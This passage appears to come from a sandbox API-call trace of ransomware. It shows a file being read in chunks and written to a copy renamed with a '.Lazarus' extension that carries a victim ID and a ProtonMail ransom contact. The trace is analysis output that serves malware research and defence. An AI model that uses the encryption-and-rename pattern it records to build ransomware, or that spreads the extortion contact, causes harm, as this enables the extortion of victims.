dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.483] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.483] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.483] CloseHandle (hObject=0x410) returned 1 [0072.483] AreFileApisANSI () returned 1 [0072.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0072.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0072.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.484] GetFileType (hFile=0x410) returned 0x1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.484] CloseHandle (hObject=0x410) returned 1 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.485] AreFileApisANSI () returned 1 [0072.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0072.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0072.485] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90)) returned 1 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.485] AreFileApisANSI () returned 1 [0072.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.485] GetLastError () returned 0x0 [0072.485] SetLastError (dwErrCode=0x0) [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e458 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0072.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0072.485] GetLastError () returned 0x0 [0072.485] SetLastError (dwErrCode=0x0) [0072.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0072.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0072.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.486] AreFileApisANSI () returned 1 [0072.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a660, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x80a30 [0072.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a660, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0072.486] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.486] GetFileType (hFile=0x410) returned 0x1 [0072.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0072.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0072.487] AreFileApisANSI () returned 1 [0072.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0072.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0072.487] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.487] GetFileType (hFile=0x418) returned 0x1 [0072.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.487] GetLastError () returned 0x0 [0072.487] SetLastError (dwErrCode=0x0) [0072.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.487] GetLastError () returned 0x0 [0072.487] SetLastError (dwErrCode=0x0) [0072.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.487] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0072.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0072.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.489] GetLastError () returned 0x0 [0072.490] SetLastError (dwErrCode=0x0) [0072.490] GetLastError () returned 0x0 [0072.490] SetLastError (dwErrCode=0x0) [0072.490] GetLastError () returned 0x0 [0072.490] SetLastError (dwErrCode=0x0) [0072.490] GetLastError () returned 0x0 [0072.490] SetLastError (dwErrCode=0x0) [0072.490] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.491] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.491] GetLastError () returned 0x0 [0072.492] SetLastError (dwErrCode=0x0) [0072.492] GetLastError () returned 0x0 [0072.492] SetLastError (dwErrCode=0x0) [0072.492] GetLastError () returned 0x0 [0072.492] SetLastError (dwErrCode=0x0) [0072.492] GetLastError () returned 0x0 [0072.492] SetLastError (dwErrCode=0x0) [0072.492] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.492] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.493] GetLastError () returned 0x0 [0072.493] SetLastError (dwErrCode=0x0) [0072.493] GetLastError () returned 0x0 [0072.493] SetLastError (dwErrCode=0x0) [0072.493] GetLastError () returned 0x0 [0072.493] SetLastError (dwErrCode=0x0) [0072.493] GetLastError () returned 0x0 [0072.493] SetLastError (dwErrCode=0x0) [0072.493] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.493] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.494] GetLastError () returned 0x0 [0072.494] SetLastError (dwErrCode=0x0) [0072.494] GetLastError () returned 0x0 [0072.494] SetLastError (dwErrCode=0x0) [0072.494] GetLastError () returned 0x0 [0072.494] SetLastError (dwErrCode=0x0) [0072.494] GetLastError () returned 0x0 [0072.494] SetLastError (dwErrCode=0x0) [0072.494] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.494] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.494] GetLastError () returned 0x0 [0072.494] SetLastError (dwErrCode=0x0) [0072.495] GetLastError () returned 0x0 [0072.495] SetLastError (dwErrCode=0x0) [0072.495] GetLastError () returned 0x0 [0072.495] SetLastError (dwErrCode=0x0) [0072.495] GetLastError () returned 0x0 [0072.495] SetLastError (dwErrCode=0x0) [0072.495] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.495] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.495] GetLastError () returned 0x0 [0072.495] SetLastError (dwErrCode=0x0) [0072.495] GetLastError () returned 0x0 [0072.496] SetLastError (dwErrCode=0x0) [0072.496] GetLastError () returned 0x0 [0072.496] SetLastError (dwErrCode=0x0) [0072.496] GetLastError () returned 0x0 [0072.496] SetLastError (dwErrCode=0x0) [0072.496] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.496] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.496] GetLastError () returned 0x0 [0072.496] SetLastError (dwErrCode=0x0) [0072.496] GetLastError () returned 0x0 [0072.496] SetLastError (dwErrCode=0x0) [0072.496] GetLastError () returned 0x0 [0072.497] SetLastError (dwErrCode=0x0) [0072.497] GetLastError () returned 0x0 [0072.497] SetLastError (dwErrCode=0x0) [0072.497] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.497] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.497] GetLastError () returned 0x0 [0072.497] SetLastError (dwErrCode=0x0) [0072.497] GetLastError () returned 0x0 [0072.497] SetLastError (dwErrCode=0x0) [0072.497] GetLastError () returned 0x0 [0072.497] SetLastError (dwErrCode=0x0) [0072.497] GetLastError () returned 0x0 [0072.497] SetLastError (dwErrCode=0x0) [0072.498] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.498] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.498] GetLastError () returned 0x0 [0072.498] SetLastError (dwErrCode=0x0) [0072.498] GetLastError () returned 0x0 [0072.498] SetLastError (dwErrCode=0x0) [0072.498] GetLastError () returned 0x0 [0072.498] SetLastError (dwErrCode=0x0) [0072.498] GetLastError () returned 0x0 [0072.498] SetLastError (dwErrCode=0x0) [0072.498] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.499] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.499] GetLastError () returned 0x0 [0072.499] SetLastError (dwErrCode=0x0) [0072.499] GetLastError () returned 0x0 [0072.499] SetLastError (dwErrCode=0x0) [0072.499] GetLastError () returned 0x0 [0072.499] SetLastError (dwErrCode=0x0) [0072.499] GetLastError () returned 0x0 [0072.499] SetLastError (dwErrCode=0x0) [0072.499] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.500] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.500] GetLastError () returned 0x0 [0072.500] SetLastError (dwErrCode=0x0) [0072.500] GetLastError () returned 0x0 [0072.500] SetLastError (dwErrCode=0x0) [0072.500] GetLastError () returned 0x0 [0072.500] SetLastError (dwErrCode=0x0) [0072.500] GetLastError () returned 0x0 [0072.500] SetLastError (dwErrCode=0x0) [0072.500] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.500] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.501] GetLastError () returned 0x0 [0072.501] SetLastError (dwErrCode=0x0) [0072.501] GetLastError () returned 0x0 [0072.501] SetLastError (dwErrCode=0x0) [0072.501] GetLastError () returned 0x0 [0072.501] SetLastError (dwErrCode=0x0) [0072.501] GetLastError () returned 0x0 [0072.501] SetLastError (dwErrCode=0x0) [0072.501] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.501] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.502] GetLastError () returned 0x0 [0072.502] SetLastError (dwErrCode=0x0) [0072.502] GetLastError () returned 0x0 [0072.502] SetLastError (dwErrCode=0x0) [0072.502] GetLastError () returned 0x0 [0072.502] SetLastError (dwErrCode=0x0) [0072.502] GetLastError () returned 0x0 [0072.502] SetLastError (dwErrCode=0x0) [0072.502] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.502] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.502] GetLastError () returned 0x0 [0072.502] SetLastError (dwErrCode=0x0) [0072.503] GetLastError () returned 0x0 [0072.503] SetLastError (dwErrCode=0x0) [0072.503] GetLastError () returned 0x0 [0072.503] SetLastError (dwErrCode=0x0) [0072.503] GetLastError () returned 0x0 [0072.503] SetLastError (dwErrCode=0x0) [0072.503] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0xd90, lpOverlapped=0x0) returned 1 [0072.503] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.503] GetLastError () returned 0x0 [0072.503] SetLastError (dwErrCode=0x0) [0072.503] GetLastError () returned 0x0 [0072.503] SetLastError (dwErrCode=0x0) [0072.504] GetLastError () returned 0x0 [0072.504] SetLastError (dwErrCode=0x0) [0072.504] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.504] GetLastError () returned 0x0 [0072.504] SetLastError (dwErrCode=0x0) [0072.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0072.504] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0xd90, lpOverlapped=0x0) returned 1 [0072.504] GetLastError () returned 0x0 [0072.504] SetLastError (dwErrCode=0x0) [0072.504] GetLastError () returned 0x0 [0072.504] SetLastError (dwErrCode=0x0) [0072.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0072.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.505] CloseHandle (hObject=0x410) returned 1 [0072.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.506] CloseHandle (hObject=0x418) returned 1 [0072.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.507] AreFileApisANSI () returned 1 [0072.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0072.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0072.507] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, 